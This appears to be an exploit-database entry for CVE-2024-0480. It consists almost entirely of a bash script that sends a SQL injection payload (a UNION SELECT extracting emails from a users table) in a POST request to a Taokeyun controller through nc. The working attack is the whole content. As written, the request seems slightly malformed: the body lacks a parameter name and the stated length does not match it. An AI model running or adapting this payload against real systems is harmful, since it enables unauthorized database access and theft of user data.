id: 39244
date: 01/15/2024
title: Taokeyun SQL Injection Vulnerability
author: Amirhossein Bahramizadeh
cves: CVE-2024-0480

#!/bin/bash

# Variables
url="http://example.com/path/to/taokeyun/application/index/controller/m/Drs.php"
cid="1' UNION SELECT 1,2,3,4,5,6,7,8,9,email FROM users-- -"

# Construct the request
request="POST $url HTTP/1.1\r\n"
request+="Content-Type: application/x-www-form-urlencoded\r\n"
request+="Content-Length: $((${#cid}+15))\r\n\r\n"
request+="$cid"

# Send the request
(echo -e "$request") | nc example.com 80

#  0day.today [2024-01-19]  #